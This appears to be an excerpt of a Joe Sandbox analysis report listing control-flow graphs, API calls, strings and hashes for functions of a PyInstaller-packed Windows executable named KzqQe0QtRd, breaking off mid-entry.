                                                                                                                                                                                            control_flow_graph 798 7ff7012850cc-7ff701285101 call 7ff7012847d8 call 7ff7012847e0 call 7ff701284848 805 7ff701285107-7ff701285112 call 7ff7012847e8 798->805 806 7ff70128523f-7ff7012852ad call 7ff701279e00 call 7ff7012806e8 798->806 805->806 811 7ff701285118-7ff701285123 call 7ff701284818 805->811 818 7ff7012852bb-7ff7012852be 806->818 819 7ff7012852af-7ff7012852b6 806->819 811->806 817 7ff701285129-7ff70128514c call 7ff701279e48 GetTimeZoneInformation 811->817 831 7ff701285214-7ff70128523e call 7ff7012847d0 call 7ff7012847c0 call 7ff7012847c8 817->831 832 7ff701285152-7ff701285173 817->832 821 7ff7012852f5-7ff701285308 call 7ff70127cafc 818->821 822 7ff7012852c0 818->822 820 7ff70128534b-7ff70128534e 819->820 824 7ff7012852c3 call 7ff7012850cc 820->824 825 7ff701285354-7ff70128535c call 7ff701284e50 820->825 838 7ff70128530a 821->838 839 7ff701285313-7ff70128532e call 7ff7012806e8 821->839 822->824 835 7ff7012852c8-7ff7012852f4 call 7ff701279e48 call 7ff70126adb0 824->835 825->835 833 7ff70128517e-7ff701285185 832->833 834 7ff701285175-7ff70128517b 832->834 841 7ff701285199 833->841 842 7ff701285187-7ff70128518f 833->842 834->833 845 7ff70128530c-7ff701285311 call 7ff701279e48 838->845 852 7ff701285335-7ff701285347 call 7ff701279e48 839->852 853 7ff701285330-7ff701285333 839->853 848 7ff70128519b-7ff70128520f call 7ff70126c240 * 4 call 7ff701281cac call 7ff701285364 * 2 841->848 842->841 847 7ff701285191-7ff701285197 842->847 845->822 847->848 848->831 852->820 853->845
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7012850FA
                                                                                                                                                                                              • Part of subcall function 00007FF701284848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70128485C
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF70128510B
                                                                                                                                                                                              • Part of subcall function 00007FF7012847E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7012847FC
                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF70128511C
                                                                                                                                                                                              • Part of subcall function 00007FF701284818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70128482C
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E5E
                                                                                                                                                                                              • Part of subcall function 00007FF701279E48: GetLastError.KERNEL32(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E68
                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70128535C), ref: 00007FF701285143
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
                                                                                                                                                                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                                            • API String ID: 1182710636-986674615
                                                                                                                                                                                            • Opcode ID: 6a4653e18601d3b1e77d8173c576dc07d233a5b3d88cbe8539a6bd7f52c7a8a1
                                                                                                                                                                                            • Instruction ID: e78c9c5effacba555b1388ff40d29930e0848997720c6a9249e041ea5828c29f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a4653e18601d3b1e77d8173c576dc07d233a5b3d88cbe8539a6bd7f52c7a8a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54518D36B1968387E710FF65ED801A9E760BF48794FC04136EA4D83A96DFBCE4408B60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                            • Opcode ID: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                                            • Instruction ID: dabec899f709bc03a4e50f689c8c25edd7552cfd35599794358e00fc5e27c2d3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0A432B1968286F7609F64F885766B390BF84768F840335D66D026D4DF7CD408DB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 59578552-0
                                                                                                                                                                                            • Opcode ID: 849d31c9d0e3471d2442f6613f577452aa3d5b357717c409d53f5d32c0c9655f
                                                                                                                                                                                            • Instruction ID: 4110b192ac161f0cf9008864920ce8109cde7674d6aec821d190acb5f82c10bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 849d31c9d0e3471d2442f6613f577452aa3d5b357717c409d53f5d32c0c9655f
                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E0B670F1D14386EB19B7694C870BA90905F55320FE01235E11D822C2DFEC25929B32
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                            • API String ID: 2153230061-4158440160
                                                                                                                                                                                            • Opcode ID: 1dc18464c704c51c7b33cb3537bb8e28e87f5efd691d19b5572202d153325910
                                                                                                                                                                                            • Instruction ID: 4e4c9710c36fddf253aee97ec84f2a306effb7f37de68e9d2f7536b8a7b2b4ea
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc18464c704c51c7b33cb3537bb8e28e87f5efd691d19b5572202d153325910
                                                                                                                                                                                            • Instruction Fuzzy Hash: 08515172B1A60786EB54EF25D850178B3A0FF88B58B918136DA0D877D9DFBCE450C760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 53 7ff701261440-7ff701261457 call 7ff701266740 56 7ff701261459-7ff701261461 53->56 57 7ff701261462-7ff701261485 call 7ff701266a60 53->57 60 7ff7012614a7-7ff7012614ad 57->60 61 7ff701261487-7ff7012614a2 call 7ff7012624d0 57->61 63 7ff7012614e0-7ff7012614f4 call 7ff70126f964 60->63 64 7ff7012614af-7ff7012614ba call 7ff701263cd0 60->64 70 7ff701261635-7ff701261647 61->70 72 7ff701261516-7ff70126151a 63->72 73 7ff7012614f6-7ff701261511 call 7ff7012624d0 63->73 68 7ff7012614bf-7ff7012614c5 64->68 68->63 71 7ff7012614c7-7ff7012614db call 7ff701262770 68->71 83 7ff701261617-7ff70126161d 71->83 76 7ff70126151c-7ff701261528 call 7ff701261050 72->76 77 7ff701261534-7ff701261554 call 7ff7012740e0 72->77 73->83 84 7ff70126152d-7ff70126152f 76->84 85 7ff701261556-7ff701261570 call 7ff7012624d0 77->85 86 7ff701261575-7ff70126157b 77->86 87 7ff70126162b-7ff70126162e call 7ff70126f2dc 83->87 88 7ff70126161f call 7ff70126f2dc 83->88 84->83 99 7ff70126160d-7ff701261612 85->99 90 7ff701261605-7ff701261608 call 7ff7012740cc 86->90 91 7ff701261581-7ff701261586 86->91 98 7ff701261633 87->98 97 7ff701261624 88->97 90->99 96 7ff701261590-7ff7012615b2 call 7ff70126f62c 91->96 102 7ff7012615b4-7ff7012615cc call 7ff70126fd6c 96->102 103 7ff7012615e5-7ff7012615ec 96->103 97->87 98->70 99->83 109 7ff7012615ce-7ff7012615d1 102->109 110 7ff7012615d5-7ff7012615e3 102->110 104 7ff7012615f3-7ff7012615fb call 7ff7012624d0 103->104 111 7ff701261600 104->111 109->96 112 7ff7012615d3 109->112 110->104 111->90 112->111
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                            • API String ID: 0-666925554
                                                                                                                                                                                            • Opcode ID: bc080c0b3eb269f511fc0b7da9fb55b4b4bb094d1f888afb271177b68dfb6a67
                                                                                                                                                                                            • Instruction ID: 994dc3deab7e8f620412949c353d7dd0f9cabdbc81b3261aed1bc4b08cdb01bf
                                                                                                                                                                                            • Opcode Fuzzy Hash: bc080c0b3eb269f511fc0b7da9fb55b4b4bb094d1f888afb271177b68dfb6a67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 25519921B0964385EB20FB21ED506B9E3A0EF85B98F844532DE1D87AD5EFBCF5558320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00007FF70126687A,?,?,00000000,?,?,00007FF70126676D), ref: 00007FF701267910
                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF701267921
                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF701267943
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF70126794D
                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF70126798A
                                                                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF70126799C
                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF7012679B4
                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF7012679E6
                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF701267A0D
                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,?,?,00007FF70126676D), ref: 00007FF701267A1E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                            • API String ID: 4998090-2855260032
                                                                                                                                                                                            • Opcode ID: 03e154d72cef7596c19cf90f58cf8d02b1ad3eb61a0626a7ad8befbf5a95a7ea
                                                                                                                                                                                            • Instruction ID: f59c8bff6517043c89ba187705c2c9b9d8a80af69f7884f7eb3f71779d32bd82
                                                                                                                                                                                            • Opcode Fuzzy Hash: 03e154d72cef7596c19cf90f58cf8d02b1ad3eb61a0626a7ad8befbf5a95a7ea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 66414D3171D68382EB50AF60E8447AAB361FF84794F940231EA5E87AD5DFBCD544C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                            • Opcode ID: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                                            • Instruction ID: 458cb3d6bb1e32987e9a1f8cb3a35a131d3da03ca995aec08c8177b26cbd8e54
                                                                                                                                                                                            • Opcode Fuzzy Hash: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: E041FF31B0978386DB20AB64B8552AAF2A1EF95364F900236E6AD43AD5DFBCD0548B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 383 7ff701261000-7ff7012636a6 call 7ff70126f0b0 call 7ff70126f0a8 call 7ff701267630 call 7ff70126f0a8 call 7ff70126ade0 call 7ff7012742a0 call 7ff701274f44 call 7ff701261af0 401 7ff7012636ac-7ff7012636bb call 7ff701263bc0 383->401 402 7ff7012637ba 383->402 401->402 407 7ff7012636c1-7ff7012636d4 call 7ff701263a90 401->407 404 7ff7012637bf-7ff7012637df call 7ff70126adb0 402->404 407->402 411 7ff7012636da-7ff7012636ed call 7ff701263b40 407->411 411->402 414 7ff7012636f3-7ff70126371a call 7ff7012669b0 411->414 417 7ff70126375c-7ff701263784 call 7ff701266fc0 call 7ff7012619d0 414->417 418 7ff70126371c-7ff70126372b call 7ff7012669b0 414->418 428 7ff70126386d-7ff70126387e 417->428 429 7ff70126378a-7ff7012637a0 call 7ff7012619d0 417->429 418->417 424 7ff70126372d-7ff701263733 418->424 426 7ff701263735-7ff70126373d 424->426 427 7ff70126373f-7ff701263759 call 7ff7012740cc call 7ff701266fc0 424->427 426->427 427->417 433 7ff701263893-7ff7012638ab call 7ff701267a60 428->433 434 7ff701263880-7ff70126388a call 7ff7012632a0 428->434 441 7ff7012637e0-7ff7012637e3 429->441 442 7ff7012637a2-7ff7012637b5 call 7ff701262770 429->442 446 7ff7012638be-7ff7012638c5 SetDllDirectoryW 433->446 447 7ff7012638ad-7ff7012638b9 call 7ff701262770 433->447 444 7ff70126388c 434->444 445 7ff7012638cb-7ff7012638d8 call 7ff701265e60 434->445 441->428 449 7ff7012637e9-7ff701263800 call 7ff701263cd0 441->449 442->402 444->433 458 7ff7012638da-7ff7012638ea call 7ff701265b00 445->458 459 7ff701263926-7ff70126392b call 7ff701265de0 445->459 446->445 447->402 456 7ff701263807-7ff701263833 call 7ff701267230 449->456 457 7ff701263802-7ff701263805 449->457 468 7ff70126385d-7ff70126386b 456->468 469 7ff701263835-7ff70126383d call 7ff70126f2dc 456->469 460 7ff701263842-7ff701263858 call 7ff701262770 457->460 458->459 473 7ff7012638ec-7ff7012638fb call 7ff701265660 458->473 466 7ff701263930-7ff701263933 459->466 460->402 471 7ff701263939-7ff701263946 466->471 472 7ff7012639e6-7ff7012639f5 call 7ff701263130 466->472 468->434 469->460 477 7ff701263950-7ff70126395a 471->477 472->402 487 7ff7012639fb-7ff701263a32 call 7ff701266f50 call 7ff7012669b0 call 7ff7012653f0 472->487 485 7ff70126391c-7ff701263921 call 7ff7012658b0 473->485 486 7ff7012638fd-7ff701263909 call 7ff7012655e0 473->486 481 7ff70126395c-7ff701263961 477->481 482 7ff701263963-7ff701263965 477->482 481->477 481->482 483 7ff701263967-7ff70126398a call 7ff701261b30 482->483 484 7ff7012639b1-7ff7012639e1 call 7ff701263290 call 7ff7012630d0 call 7ff701263280 call 7ff7012658b0 call 7ff701265de0 482->484 483->402 497 7ff701263990-7ff70126399b 483->497 484->404 485->459 486->485 498 7ff70126390b-7ff70126391a call 7ff701265cb0 486->498 487->402 510 7ff701263a38-7ff701263a6d call 7ff701263290 call 7ff701267000 call 7ff7012658b0 call 7ff701265de0 487->510 501 7ff7012639a0-7ff7012639af 497->501 498->466 501->484 501->501 523 7ff701263a77-7ff701263a7a call 7ff701261ab0 510->523 524 7ff701263a6f-7ff701263a72 call 7ff701266cc0 510->524 527 7ff701263a7f-7ff701263a81 523->527 524->523 527->404
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00007FF701263BC0: GetModuleFileNameW.KERNEL32(?,00007FF7012636B9), ref: 00007FF701263BF1
                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7012638C5
                                                                                                                                                                                              • Part of subcall function 00007FF7012669B0: GetEnvironmentVariableW.KERNEL32(00007FF701263707), ref: 00007FF7012669EA
                                                                                                                                                                                              • Part of subcall function 00007FF7012669B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF701266A07
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                            • API String ID: 2344891160-3602715111
                                                                                                                                                                                            • Opcode ID: 07f0ef2215250b27e6eaf02b6ff3d8cf42110019093b3ed0ac700251090d4b1b
                                                                                                                                                                                            • Instruction ID: 76371daea5d4ce7c83c412e9b393e2912d8e9a9a3ff37a8a8797c21b0888f1bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f0ef2215250b27e6eaf02b6ff3d8cf42110019093b3ed0ac700251090d4b1b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B16E21B1D68341FB65FB219D512FEA291BF84784FC44032EA4E876DAEFACE505C760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 528 7ff701261050-7ff7012610ab call 7ff70126a640 531 7ff7012610ad-7ff7012610d2 call 7ff701262770 528->531 532 7ff7012610d3-7ff7012610eb call 7ff7012740e0 528->532 537 7ff7012610ed-7ff701261104 call 7ff7012624d0 532->537 538 7ff701261109-7ff701261119 call 7ff7012740e0 532->538 543 7ff70126126c-7ff701261281 call 7ff70126a320 call 7ff7012740cc * 2 537->543 544 7ff70126111b-7ff701261132 call 7ff7012624d0 538->544 545 7ff701261137-7ff701261147 538->545 561 7ff701261286-7ff7012612a0 543->561 544->543 547 7ff701261150-7ff701261175 call 7ff70126f62c 545->547 555 7ff70126117b-7ff701261185 call 7ff70126f3a0 547->555 556 7ff70126125e 547->556 555->556 562 7ff70126118b-7ff701261197 555->562 559 7ff701261264 556->559 559->543 563 7ff7012611a0-7ff7012611c8 call 7ff701268a90 562->563 566 7ff7012611ca-7ff7012611cd 563->566 567 7ff701261241-7ff70126125c call 7ff701262770 563->567 568 7ff70126123c 566->568 569 7ff7012611cf-7ff7012611d9 566->569 567->559 568->567 571 7ff7012611db-7ff7012611e8 call 7ff70126fd6c 569->571 572 7ff701261203-7ff701261206 569->572 579 7ff7012611ed-7ff7012611f0 571->579 574 7ff701261208-7ff701261216 call 7ff70126bb90 572->574 575 7ff701261219-7ff70126121e 572->575 574->575 575->563 578 7ff701261220-7ff701261223 575->578 581 7ff701261237-7ff70126123a 578->581 582 7ff701261225-7ff701261228 578->582 583 7ff7012611fe-7ff701261201 579->583 584 7ff7012611f2-7ff7012611fc call 7ff70126f3a0 579->584 581->559 582->567 585 7ff70126122a-7ff701261232 582->585 583->567 584->575 584->583 585->547
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                            • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                            • API String ID: 2030045667-1655038675
                                                                                                                                                                                            • Opcode ID: 609a4ae9e3142b70f2d2471d26a079b0dbe6029478b7fa52329abca79a32aa01
                                                                                                                                                                                            • Instruction ID: 5635aa086e622b32d2db77fe2a854d60c19801be038626b0999a594232295f5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 609a4ae9e3142b70f2d2471d26a079b0dbe6029478b7fa52329abca79a32aa01
